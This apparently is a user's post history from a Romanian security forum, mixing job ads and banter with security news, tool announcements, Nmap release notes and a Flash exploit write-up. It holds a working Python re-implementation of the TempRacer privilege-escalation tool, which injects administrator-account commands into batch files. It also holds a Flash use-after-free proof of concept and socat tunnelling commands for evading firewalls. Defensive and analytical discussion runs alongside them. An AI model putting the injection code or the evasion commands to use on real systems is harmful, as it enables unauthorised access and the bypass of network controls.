Nytro
Everything posted by Nytro

  1. Jobs available at the start of April: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4376842

    A few selected jobs:
    Penetration Testing Consultant - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285
    Network Engineer - Telecom - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891
    Information Security Specialist - Rotating Shifts - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-specialist-rotating-shifts-80306
    Desktop Support Analyst - Rotating Shifts - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/desktop-support-analyst-rotating-shifts-82324
    Firewall Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-engineer-81902
    Windows System Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417
    .NET Software Development Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-advisor-83641
    Java Software Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-developer-82960
    Senior Java Software Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-java-software-developer-82976
    Senior Virtualization Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senio-virtualization-administor-83424
    Back-Up and Recovery Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/back-up-and-recovery-administrator-83426
    Junior .NET Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-.net-developer-84945
    IT Project Manager - Software - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/it-project-manager-software-85560
    .NET Software Development Sr. Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-sr.-advisor-86039
    Local IT Support - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137
    Network Engineering Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077
    Endpoint Security Advisor Encryption - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/endpoint-security-advisor-encryption-84579
    Technical Support Supervisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-supervisor-85867
    IDS Support Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/ids-support-engineer-83942
    Firewall Support Sr. Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-support-sr-engineer-83948
    Vulnerability Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444

    If you have any questions, send me a private message. If anyone is interested in the Penetration Tester position, I can give you more details; there are several openings available.
  2. What? Are you sure you haven't had too much to drink?
  3. Any idea what exactly this "vaccine" does?
  4. It's written in C# (so it seems); even malware isn't what it used to be these days...
  5. Cioloș is a fool. He claims "Romanian PrePay SIM cards were used for attacks". He can suck it; even the SRI only said they "are active in conflict territories, blah blah" but said nothing of the sort. This Cioloș must be some kind of Mama Omida (fortune teller), and the public believes him... Besides, in Europe there are more countries that allow buying a SIM card without an ID than countries that don't. He said "most don't allow it without an ID", so again, he can suck it. Then, you ban them in Romania, but they aren't banned in 20 other countries. What does that prevent? Nothing. The damn services don't have enough money and use attacks to manipulate public opinion and turn people into slaves. And one more thing: guns and rocket launchers are sold on the black market, and you think a few SIM cards can't be?

    "I called the Brussels prosecutor's office today to ask whether there is any information about the Romanian prepaid phone numbers used by terrorists. This is what Prime Minister Dacian Cioloș said: 'Prepaid cards from Romania were used in preparing attacks in the EU.' At the prosecutor's office (I have a thin contact there too), after they figured out it wasn't Armenia but Romania (people around here are bad at geography), it was confirmed to me (to my relief) that no, none of the terrorists had a Romanian prepaid phone. Same in Paris, where I tried even more cunningly to find out. Nada, nobody. Only French and Belgian phones." Dan Alexe, Radio Free Europe correspondent, Brussels.
  6. TempRacer – Windows Privilege Escalation Tool

    March 29, 2016

    TempRacer is a Windows Privilege Escalation Tool written in C#, designed to automate the process of injecting user creation commands into batch files that run with administrator-level privileges. The code itself does not use many resources because it relies on callbacks from the OS. You can keep it running for the whole day to try and catch the creation of an admin-level batch file. It's especially useful (and very successful) in environments where automated patching systems like BigFix are running. If you are able to trigger updates or new software installs, you should give it a try.

    If successful, it will inject the code to add the user "alex" with password "Hack123123" and add him to the local Administrators group. It will also block the file from further changes, so the privilege escalation code stays inside.

    You can also find some Windows Privilege Escalation Tools in: PowerSploit – A PowerShell Post-Exploitation Framework. And if you want to scan for privilege issues or misconfiguration, use this – windows-privesc-check – Windows Privilege Escalation Scanner.

    You can download TempRacer here: – TempRacer.exe – tempracer-1.zip (Source). Or read more here.

    Source: http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/
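The race the post describes, as an added example that is not TempRacer's own code: a polling pass over a directory that appends the "alex" user-creation commands to any batch file the installer drops there, next to the integrity check an installer would need in order to notice the injection before executing the file. TempRacer uses OS change callbacks and then locks the file; this version polls instead, and the Windows-specific exclusive lock is not reproduced. The directory, file name and batch contents in the demo are constructed for the example.

```python
"""Polling re-implementation of the TempRacer idea, plus the integrity check
that defeats it. Added example for this page; not TempRacer's own source."""
import hashlib
import os
import tempfile
import time

# The two commands the page says TempRacer injects (user "alex", password "Hack123123").
PAYLOAD = "net user alex Hack123123 /add\r\nnet localgroup administrators alex /add\r\n"
BATCH_SUFFIXES = (".bat", ".cmd")


def inject_into_new_batch_files(watch_dir, seen):
    """One polling pass over watch_dir (TempRacer uses OS change callbacks instead).

    Every batch file not yet in `seen` gets PAYLOAD appended; the returned list
    names the files touched in this pass.  The exclusive lock TempRacer holds
    afterwards is Windows-specific and is not reproduced here."""
    injected = []
    with os.scandir(watch_dir) as entries:
        for entry in entries:
            if not entry.is_file() or not entry.name.lower().endswith(BATCH_SUFFIXES):
                continue
            if entry.path in seen:
                continue
            seen.add(entry.path)
            with open(entry.path, "ab") as fh:      # append, so the installer's own lines run too
                fh.write(PAYLOAD.encode("ascii"))
            injected.append(entry.path)
    return injected


def race(watch_dir, passes=20, interval=0.05):
    """Keep polling for a while; returns every file injected during the run."""
    seen, hits = set(), []
    for _ in range(passes):
        hits += inject_into_new_batch_files(watch_dir, seen)
        time.sleep(interval)
    return hits


def write_batch_for_execution(path, content):
    """How an installer should create its script: exclusive create (an attacker-planted
    file with that name is rejected), owner-only mode, and a digest of what was written."""
    data = content.encode("utf-8")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return hashlib.sha256(data).hexdigest()


def verify_before_run(path, expected_digest):
    """Return True only if the file still matches what the installer wrote."""
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest() == expected_digest


def demo():
    """Constructed scenario: an 'installer' drops update.bat into a temp directory
    the racer is polling.  Returns (racer_hit_it, payload_present, integrity_ok,
    second_pass_empty)."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "update.bat")
        digest = write_batch_for_execution(script, "@echo off\r\nmsiexec /i patch.msi /qn\r\n")
        seen = set()
        touched = inject_into_new_batch_files(tmp, seen)
        with open(script, "rb") as fh:
            payload_present = PAYLOAD.encode("ascii") in fh.read()
        second_pass_empty = inject_into_new_batch_files(tmp, seen) == []
        return (touched == [script], payload_present,
                verify_before_run(script, digest), second_pass_empty)


if __name__ == "__main__":
    print(demo())
```

The digest check is the part worth keeping: the window between "file written" and "file executed" is exactly what TempRacer races, and a service that re-hashes the script (or, better, never writes it to a directory other users can reach) closes that window regardless of how fast the watcher reacts.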
  7. PwnWiki.io

    PwnWiki.io is a collection of TTPs (tools, tactics, and procedures) for what to do after access has been gained.

    Live Online Copy: You can find a copy of the project online at: http://pwnwiki.io

    Offline Use: Clone the repository or pull the archive (download zip) of the repo and open index.html. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use Mongoose Tiny or HFS to host the files locally. On OSX and Linux, python -m SimpleHTTPServer seems to work just fine.

    Referenced tools can be found here: https://github.com/mubix/post-exploitation (if they aren't built into the OS)
  8. PenBox

    A Penetration Testing Framework, The Hacker's Repo. Our hope is that in the last version we will have every script that a hacker needs. THIS TOOL IS FOR EDUCATIONAL PURPOSES ONLY.

    Requirements: Python 2, sudoer

    Link: https://github.com/x3omdax/PenBox
  9. USB Thief, the new USB-based data stealing Trojan

    March 29, 2016 By Pierluigi Paganini

    USB Thief, the new USB-based data-stealing Trojan discovered by ESET, relies on USB devices in order to spread itself and can also infect air-gapped systems.

    Security researchers at ESET have discovered a new insidious data-stealer, dubbed USB Thief (Win32/PSW.Stealer.NAI), that relies on USB devices in order to spread itself. USB Thief is able to infect air-gapped or isolated systems and does not leave any trace of activity on the infected systems. The malware authors have implemented special mechanisms to protect USB Thief from being detected and analyzed. The authors also implemented an advanced multi-staged encryption process to protect the Trojan.

    "The USB Thief is, in many aspects, different from the more common malware types that we're used to seeing flooding the internet," wrote Tomáš Gardoň, a malware analyst at ESET. "This one uses only USB devices for propagation, and it does not leave any evidence on the compromised computer. Its creators also employ special mechanisms to protect the malware from being reproduced or copied, which makes it even harder to detect and analyze."

    The USB Thief Trojan can be stored either as a Dynamically Linked Library (DLL) used by a portable application or as a portable application's plugin source. Mobile devices are usually used to store portable versions of common applications like Firefox, TrueCrypt, and Notepad++. When victims launch the portable application, USB Thief runs in the background.

    "Unfortunately, this is not the case with the USB Thief as it uses an uncommon way to trick a user – it benefits from the fact that USB devices often store portable versions of some common applications like Firefox portable, Notepad++ portable, TrueCrypt portable and so on," continues the post.

    The malware resides completely on the USB device; it doesn't leave any trace of its presence.

    According to the experts at ESET, any tool that could be used to breach an air-gapped network must be taken into account. "Well, taking into account that organizations isolate some of their systems for a good reason," said Peter Stancik, security evangelist at ESET, "any tool capable of attacking these so-called air-gapped systems must be regarded as dangerous." "People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy."

    How can organizations prevent attacks based on USB Thief from succeeding?
      • Do not use USB storage devices from sources that may not be trustworthy.
      • Disable USB ports wherever possible.
      • Define strict policies to enforce care in the use of USB devices.
      • Train the staff on cyber threats.

    Pierluigi Paganini

    Source: http://securityaffairs.co/wordpress/45741/malware/usb-thief-trojan.html
  10. Life After the Isolated Heap

    Posted by Natalie Silvanovich, Mourner of Lost Exploits

    Over the past few months, Adobe has introduced a number of changes to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs discovered after the Isolated Heap was implemented to explore how it impacts their exploitability.

    The Isolated Heap

    The Flash heap, MMgc, is a garbage collected heap that also supports unmanaged fixed allocations. In the past, there have been many exploits in the wild that used certain properties of the heap to aid exploitation. In particular, many exploits used the allocation properties of Vectors to gain read/write access to the entire Flash memory space via heap memory corruption bugs. Exploits that use other object types, such as ByteArray and BitmapData, have also been seen in the wild.

    MMgc was originally implemented as a type and size bucketed allocator. When memory is requested, the allocator that is called depends on the type of memory that is needed. This is related to the garbage collection properties of the memory. If it is not garbage collected, the Fixed allocator is used, otherwise the Garbage-Collected (GC) allocator is used. Within the GC allocator, there are about eight subtypes of memory that can be allocated, related to whether the memory contains pointers and whether those pointers have custom finalizers or GC routines that need to be called. Within each type, the request is sorted by size, and the memory is allocated on a heap page for that size. Large requests are allocated on their own page.

    The Isolated Heap introduces partitioning to the heap, essentially a third factor which determines where memory is allocated. There is separate memory for each partition, which is then split into subsections for different types and sizes. The goal of partitioning is to allocate objects that are likely to contain memory corruption bugs in a different area of memory than objects that are likely to be useful in exploiting memory corruption bugs, and generally add more entropy to the heap.

    There are currently three partitions on the heap. The first partition is generally used for objects that contain pointers: script objects, their backing GC-memory and certain pointer arrays. The second partition is used for objects that contain non-pointer data, mostly arrays of primitive types. The third partition is used for a small number of objects that have a history of being used in exploits. These are typically variable-sized data buffer objects. Outside of the Isolated Heap, checksumming has also been implemented to detect and abort if certain sensitive objects are ever altered.

    Full article: http://googleprojectzero.blogspot.ro/2016/03/life-after-isolated-heap.html?spref=tw
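A toy model of the bucketing the post describes, added here as an example and not taken from MMgc or the Project Zero write-up: allocations are keyed by allocator (Fixed or GC) and 16-byte size class, and a "partitioned" heap prepends the partition as the third factor. The partition and allocator assignments per object kind are a constructed mapping that follows the post's description (pointer-bearing objects in partition 1, primitive arrays in partition 2, exploit-favoured buffers in partition 3), not Flash's real tables. The point it shows is the one that matters for a use-after-free: a freed slot is only reusable by an allocation that lands in the same bucket.

```python
"""Toy model of a type- and size-bucketed allocator, with and without the
Isolated Heap's partitions. Added example for this page; not MMgc code."""
from collections import defaultdict

# Constructed mapping in the spirit of the post: which partition each kind lands in.
PARTITION_OF = {
    "ScriptObject": 1,      # contains pointers
    "pointer_array": 1,     # e.g. a backing store of object pointers
    "uint_array": 2,        # primitive data, no pointers
    "ByteArray_buffer": 3,  # variable-sized buffer with an exploit history
}
# Constructed mapping: which allocator (GC-managed or unmanaged Fixed) handles each kind.
ALLOCATOR_OF = {
    "ScriptObject": "gc",
    "pointer_array": "fixed",
    "uint_array": "fixed",
    "ByteArray_buffer": "fixed",
}


def size_class(nbytes):
    """Round a request up to its 16-byte size bucket."""
    return -(-nbytes // 16) * 16


class ToyHeap:
    """Free lists per bucket, LIFO reuse (the most recently freed slot comes back first)."""

    def __init__(self, partitioned):
        self.partitioned = partitioned
        self.free_lists = defaultdict(list)
        self.next_slot = 0

    def bucket(self, kind, nbytes):
        key = (ALLOCATOR_OF[kind], size_class(nbytes))
        if self.partitioned:
            key = (PARTITION_OF[kind],) + key   # the "third factor" the post describes
        return key

    def alloc(self, kind, nbytes):
        free = self.free_lists[self.bucket(kind, nbytes)]
        if free:
            return free.pop()
        self.next_slot += 1
        return self.next_slot

    def free(self, kind, nbytes, slot):
        self.free_lists[self.bucket(kind, nbytes)].append(slot)


def uaf_reclaim(partitioned, victim="pointer_array", attacker="uint_array", nbytes=64):
    """Free `victim`, keep a dangling reference, then allocate `attacker` of the same size.
    Returns True if the attacker's allocation lands in the victim's old slot, i.e. the
    dangling reference now points at attacker-controlled bytes."""
    heap = ToyHeap(partitioned)
    victim_slot = heap.alloc(victim, nbytes)
    heap.free(victim, nbytes, victim_slot)
    return heap.alloc(attacker, nbytes) == victim_slot


if __name__ == "__main__":
    print("unpartitioned, pointer array freed, uint array allocated:", uaf_reclaim(False))
    print("partitioned,   pointer array freed, uint array allocated:", uaf_reclaim(True))
    print("partitioned,   uint array freed,    uint array allocated:", uaf_reclaim(True, "uint_array"))
```

The third call is the caveat: partitioning separates partitions from each other, not objects within one partition, so a use-after-free on a primitive array can still be reclaimed by another primitive array of the same size.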
  11. Adobe Flash - Object.unwatch Use-After-Free Exploit

    Sources:
    https://bugs.chromium.org/p/project-zero/issues/detail?id=716
    https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html

    The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes. This issue is fairly easy to reproduce; a proof-of-concept for this issue in its entirety is:

        var o = {};
        o.unwatch();

    The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:

        void* args = alloca( args_size );
        for ( int i = 0; i < args_size; i++ ) {
            // Init args
        }
        if ( (((int) args[0]) & 6) == 6 )      // reads args[0] even when args_size == 0
            args[0] = call_toString( args[0] );
        if ( args_size < 1 ) exit();           // the argument-count check comes too late

    Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39631.zip

    Source: https://www.exploit-db.com/exploits/39631/
  12. I'll put up the new index after @Gecko fixes the problems. I added 2 plugins: 1. You'll get a warning if the last post in a topic is older than 60 days (but you'll still be able to post). 2. RSS feed for certain forums: https://rstforums.com/forum/rssalltopics.xml Please test it; I hope that RSS is OK.
  13. If it's not an MS08-067, the author can suck it.
  14. I'm working on it; there's a problem. @Gecko, what did you do?
  15. I've updated to the latest version of IPBoard. What's new: https://invisionpower.com/release-notes/ I'll deal with the other problems when I have time.
  16. Pics or didn't happen.
  17. We're waiting for proof and arguments.
  18. That's the classic "sloboz.pdf" one.
  19. How to Recognize and Prevent Social Engineering Attacks

    A few weeks ago, two malicious social engineers impersonating the IRS called one of my close family friends. They yelled at her, threatened her, and told her she owed thousands of dollars in back taxes (not true). They knew her name, her address, and family members' names. They told her they were outside her house. She was terrified. The attackers unsuccessfully tried to use fear to elicit an irrational decision (like transferring money to a random bank account). She was experiencing a vishing attack, one of the four primary methods of social engineering and one of the topics discussed in our recent webinar: Don't Be Another Statistic: How To Recognize and Prevent Social Engineering Attacks.

    These types of attacks are directed towards companies every day, and they're coming from all angles in many different forms. Hackers are capitalizing on fear, excitement, and other emotions to swindle organizations out of millions of dollars. Last week, we hosted an hour-long webinar featuring four social engineering experts, including Chris Hadnagy, founder and CEO at Social-Engineer, Inc. and author of several books, including Social Engineering: The Art of Human Hacking. Chris developed the world's first social engineering penetration testing framework and has briefed more than 30 general officers and government officials at the Pentagon about social engineering and its effect on the United States.

    Source: http://blog.bettercloud.com/how-to-recognize-and-prevent-social-engineering-attacks/
  20. Linux Kernel 4.5 Now Unofficially Available for Slackware 14.2 and Derivatives

    Linux 4.5 kernel available for Zenwalk, Slax, and SlackEX
    Mar 17, 2016 23:05 GMT · By Marius Nestor

    Softpedia has been informed today, March 17, 2016, by GNU/Linux developer Arne Exton about the immediate availability of a custom compiled Linux 4.5 kernel for Slackware Linux Current (14.2) and all of its derivatives. According to Mr. Exton, he managed to compile the recently released Linux kernel 4.5, which was officially unveiled by Linus Torvalds on March 13, 2016, exactly the same way as Slackware's latest "huge" kernel. The kernel is 64-bit only, and it can be used on the Slackware 14.2 Linux operating system, as well as any other Slackware-based distribution, including but not limited to Zenwalk, Slax, and Mr. Exton's SlackEX.

    "I have compiled a very useful (as I think) 64 bit kernel for Slackware Current (14.2) and/or all Slackware derivatives," Arne Exton reveals for Softpedia. "The kernel is compiled exactly the same way as Slackware's latest kernel huge."

    How to install Linux kernel 4.5 in Slackware 14.2

    Again, the Linux 4.5 kernel distributed by Arne Exton is compatible with any Slackware-based operating system (see above for some examples), but you should keep in mind that it only works on the 64-bit versions of these GNU/Linux distributions. The installation is pretty straightforward. All you have to do is download the linux-kernel-4.5-x86_64-exton.txz archive (check the MD5 checksum here), save it to your Home directory, extract its contents, and use the command below to install it.

    But before anything else, Arne Exton informs those who attempt to install his custom compiled kernel, which promises to offer better hardware support, that the installation will overwrite the existing kernel package, and thus the /boot/vmlinuz file. Therefore, it is recommended that you make a backup of the vmlinuz file first in case you want to roll back the changes. After installation, you might also need to modify your GRUB bootloader configuration if you've made modifications to it. Lastly, users with Nvidia graphics cards should know that they need to take a look in the /etc/modprobe.d directory before restarting the computer, and remove the "blacklisting" of the Nouveau open source graphics driver in both the blacklist.conf and nvidia-installer-disable-nouveau.conf files.

        installpkg linux-kernel-4.5-x86_64-exton.txz

    Source: http://news.softpedia.com/news/linux-kernel-4-5-now-unofficially-available-for-slackware-14-2-and-derivatives-501870.shtml
  21. From: Fyodor <fyodor () nmap org>
    Date: Thu, 17 Mar 2016 12:25:02 -0700

    Hi Folks! Before I tell you about today's new Nmap release, I wanted to share some Summer of Code news: Google posted a fantastic story by one of our Summer of Code alumni about how the program helped take him from rural China to a full-ride scholarship at the University of Virginia graduate school! His mentor David and I had the chance to meet him in San Francisco: http://google-opensource.blogspot.com/2016/02/coming-to-america-how-google-summer-of.html Way to go, Weilin!

    Also, applications are now open for GSoC 2016. But only until next Friday. We've also added several new project ideas. So if you know any college/grad students (or are one!) interested in earning $5,500 writing open source Nmap code this summer, please point them here: https://nmap.org/soc/

    And now for the main news: I'm pleased to announce the release of Nmap 7.10 with many great improvements! It's got 12 new NSE scripts, hundreds of new OS/version fingerprints, and dozens of smaller improvements and bug fixes. And that's not even counting the changes in Nmap 7.01, which we released in December but I never got around to announcing because I suck at marketing.

    Nmap 7.10 source code and binary packages for Linux, Windows, and Mac are available for free download from the usual spot: https://nmap.org/download.html

    If you find any bugs in this release, please let us know on the Nmap Dev list or bug tracker as described at https://nmap.org/book/man-bugs.html.

    Here is the full list of material changes in 7.10 and 7.01:

    o [NSE] Added 12 NSE scripts from 7 authors, bringing the total up to 527! They are all listed at https://nmap.org/nsedoc/, and the summaries are below (authors are listed in brackets):
      + [GH#322] http-apache-server-status parses the server status page of Apache's mod_status. [Eric Gershman]
      + http-vuln-cve2013-6786 detects a XSS and URL redirection vulnerability in Allegro RomPager web server. Also added a fingerprint for detecting CVE-2014-4019 to http-fingerprints.lua. [Vlatko Kosturjak]
      + [GH#226] http-vuln-cve2014-3704 detects and exploits the "Drupalgeddon" pre-auth SQL Injection vulnerability in Drupal. [Mariusz Ziulek]
      + imap-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled IMAP services. [Justin Cacak]
      + ipv6-multicast-mld-list discovers IPv6 multicast listeners with MLD probes. The discovery is the same as targets-ipv6-multicast-mld, but the subscribed addresses are decoded and listed. [Alexandru Geana, Daniel Miller]
      + ms-sql-ntlm-info extracts OS version and sometimes hostname from MS SQL Server instances via the NTLM challenge message. [Justin Cacak]
      + nntp-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled NNTP services. [Justin Cacak]
      + pop3-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled POP3 services. [Justin Cacak]
      + rusers retrieves information about logged-on users from the rusersd RPC service. [Daniel Miller]
      + [GH#333] shodan-api queries the Shodan API (https://www.shodan.io) and retrieves open port and service info from their Internet-wide scan data. [Glenn Wilkinson]
      + smtp-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled SMTP and submission services. [Justin Cacak]
      + telnet-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled Telnet services. [Justin Cacak]
    o Integrated all of your IPv4 OS fingerprint submissions from October to January (536 of them). Added 104 fingerprints, bringing the new total to 5089. Additions include Linux 4.2, more Windows 10, IBM i 7, and more. Highlights: http://seclists.org/nmap-dev/2016/q1/270 [Daniel Miller]
    o Integrated all of your service/version detection fingerprints submitted from October to January (508 of them). The signature count went up 2.2% to 10532. We now detect 1108 protocols, from icy, finger, and rtsp to ipfs, basestation, and minecraft-pe. Highlights: http://seclists.org/nmap-dev/2016/q1/271 [Daniel Miller]
    o Integrated all 12 of your IPv6 OS fingerprint submissions from October to January. The classifier added 3 new groups, including new and expanded groups for OS X, bringing the new total to 96. Highlights: http://seclists.org/nmap-dev/2016/q1/273 [Daniel Miller]
    o [NSE] Upgrade to http-form-brute allowing correct handling of token-based CSRF protections and cookies. Also, a simple database of common login forms supports Django, Wordpress, MediaWiki, Joomla, and others. [Daniel Miller]
    o [Zenmap] [GH#247] Remember window geometry (position and size) from the previous time Zenmap was run. [isjing]
    o New service probe for CORBA GIOP (General Inter-ORB Protocol) detection should elicit a not-found exception from GIOP services that do not respond to non-GIOP probes. [Quentin Hardy]
    o [GH#284] Fix retrieval of route netmasks on FreeBSD. IPv6 routes were given /32 netmasks regardless of actual netmask configured, resulting in failed routing. Reported by Martin Gysi. [Daniel Miller]
    o [GH#272][GH#269] Give option parsing errors after the usage statement, or avoid printing the usage statement in some cases. The options summary has grown quite large, requiring users to scroll to the top to see the error message. [Abhishek Singh]
    o [GH#249][Nsock] Avoid a crash on Windows reported by users using Zenmap's Slow Comprehensive Scan profile. In the case of unknown OpenSSL errors, ERR_reason_error_string would return NULL, which could not be printed with the "%s" format string. Reported by Dan Baxter. [Gisle Vanem, Daniel Miller]
    o [GH#293][Zenmap] Fix a regression in our build that caused copy-and-paste to not work in Zenmap on Windows.
    o Changed Nmap's idea of reserved and private IP addresses to include 169.254/16 (RFC3927) and remove 6/8, 7/8, and 55/8 networks. This list, in libnetutil's isipprivate function, is used to filter -iR randomly generated targets. The newly-valid address ranges belong to the U.S. Department of Defense, so users wanting to avoid those ranges should use their own exclusion lists with --exclude or --exclude-file. [Bill Parker, Daniel Miller]
    o Allow the -4 option for Nmap to indicate IPv4 address family. This is the default, and using the option doesn't change anything, but does make it more explicit which address family you want to scan. Using -4 with -6 is an error. [Daniel Miller]
    o [GH#265] When provided a verbosity of 0 (-v0), Nmap will not output any text to the screen. This happens at the time of argument parsing, so the usual meaning of "verbosity 0" is preserved. [isjing]
    o [NSE][GH#314] Fix naming of SSL2_RC2_128_CBC_WITH_MD5 and SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 ciphers in sslv2 in order to match the draft specification from Mozilla. [Bertrand Bonnefoy-Claudet]
    o [NSE][GH#320] Add STARTTLS support to sslv2 to enable SSLv2 detection against services that are not TLS encrypted by default but that support post connection upgrade. This will enable more comprehensive detection of SSLv2 and DROWN (CVE-2016-0800) attack oracles. [Tom Sellers]
    o [NSE][GH#301] Added default credential checks for RICOH Web Image Monitor and BeEF to http-default-accounts. [nnposter]
    o Properly display Next-hop MTU value from ICMP Type 3 Code 4 Fragmentation Required messages when tracing packets or in Nping output. Improper offset meant we were printing the total IP length. [Sławomir Demeszko]
    o [NSE] Added support for DHCP options "TFTP server name" and "Bootfile name" to dhcp.lua and enabled checking for options with a code above 61 by default. [Mike Rykowski]
    o [NSE] whois-ip: Don't request a remote IANA assignments data file when the local filesystem will not permit the file to be cached in a local file. [jah]
    o [NSE] Updated http-php-version hash database to cover all versions from PHP 4.1.0 to PHP 5.4.45. Based on scans of a few thousand PHP web servers pulled from Shodan API (https://www.shodan.io/) [Daniel Miller]
    o Use the same ScanProgressMeter for FTP bounce scan (-b) as for the other scan types, allowing periodic status updates with --stats-every or keypress events. [Daniel Miller]
    o [GH#274] Use a shorter pcap_select timeout on OpenBSD, just as we do for OS X, old FreeBSD, and Solaris, which use BPF for packet capture and do not have properly select-able fds. Fix by OpenBSD port maintainer [David Carlier]
    o Print service info in grepable output for ports which are not listed in nmap-services when a service tunnel (SSL) is detected. Previously, the service info ("ssl|unknown") was not printed unless the service inside the tunnel was positively identified. http://seclists.org/nmap-dev/2015/q4/260 [Daniel Miller]
    o [NSE] [GH#242] Fix multiple false-positive sources in http-backup-agent. [Tom Sellers]

    Nmap 7.01 [2015-12-09]

    o Switch to using gtk-mac-bundler and jhbuild for building the OS X installer. This promises to reduce a lot of the problems we've had with local paths and dependencies using the py2app and macports build system. [Daniel Miller]
    o The Windows installer is now built with NSIS 2.47 which features LoadLibrary security hardening to prevent DLL hijacking and other unsafe use of temporary directories. Thanks to Stefan Kanthak for reporting the issue to NSIS and to us and the many other projects that use it.
    o Updated the OpenSSL shipped with our binary builds (Windows, OS X, and RPM) to 1.0.2e.
    o [Zenmap] [GH#235] Fix several failures to launch Zenmap on OS X. The new build process eliminates these errors:
        IOError: [Errno 2] No such file or directory: '/Applications/Zenmap.app/Contents/Resources/etc/pango/pangorc.in'
        LSOpenURLsWithRole() failed for the application /Applications/Zenmap.app with error -10810.
    o [NSE] [GH#254] Update the TLSSessionRequest probe in ssl-enum-ciphers to match the one in nmap-service-probes, which was fixed previously to correct a length calculation error. [Daniel Miller]
    o [NSE] [GH#251] Correct false positives and unexpected behavior in http-* scripts which used http.identify_404 to determine when a file was not found on the target. The function was following redirects, which could be an indication of a soft-404 response. [Tom Sellers]
    o [NSE] [GH#241] Fix a false-positive in hnap-info when the target responds with 200 OK to any request. [Tom Sellers]
    o [NSE] [GH#244] Fix an error response in xmlrpc-methods when run against a non-HTTP service. The expected behavior is no output. [Niklaus Schiess]
    o [NSE] Fix SSN validation function in http-grep, reported by Bruce Barnett.

    Enjoy the new release!
    -Fyodor

    Source: http://seclists.org/nmap-announce/2016/1
  22. SSH Over SCTP (With Socat)

    Jul 27, 2015

    This is a quick post, kind of a reposting of a thing I pastebinned about a year ago that has served me REALLY well in evading stupid paywalls in airports and the likes. Also in evading a ridiculous firewall at the Uni I sometimes attend.

    The prerequisites are that you have a Linux box (maybe a Mac will work, idk. Not an OSX user but I can test if there's demand for it), a remote server, and a bit of familiarity with the command line. For the remote server, any server with a public IP address will do so long as you ensure it supports the SCTP protocol. Look up SCTP support for your distribution; usually it's the lksctp libraries that need to be installed. DigitalOcean Debian instances and Amazon EC2 Ubuntu instances seem to work fine out of the box. Your local box also needs SCTP support. Again, with Debian, Ubuntu, and Arch Linux, this never seems to be an issue. Finally, you will need SSH access to the remote box, preferably as a user with admin privs so you can set up socat on it and listen on privileged ports.

    So, here goes. On the server side (set this up BEFORE you need it), you will need to install "socat" (should be available in your distro's repos. If not, compile it from source or something!). Next, you will need to just run the following command in a screen session.

        socat SCTP-LISTEN:80,fork TCP:localhost:22
        # assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP

    This will spin up a socat listener on port 80/SCTP, and forward any traffic sent to it through to port 22/TCP on the listening host. Change these ports as you see fit - often I run sshd on a different port (443/TCP) to evade other firewalls and the likes.

    Now, on the client side, when you want to connect, you will also need socat working with SCTP support. Same deal as making it work on the server side. To spin up your socat proxy on local to forward to the remote server, do the following.

        socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
        # replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :)

    This will spin up a TCP listener on localhost:1337/TCP, which is being forwarded over SCTP to the TCP port at the other end of the tunnel (in my example, port 22). To connect to the sshd at the other end, you just need to ssh to localhost:1337, and to get yourself some SOCKS5 for web browsing through your tunnel, do dynamic port forwarding. The following example sums it up for you.

        ssh -lusername localhost -D 8080 -p 1337
        # replace username and -p port value as needed...

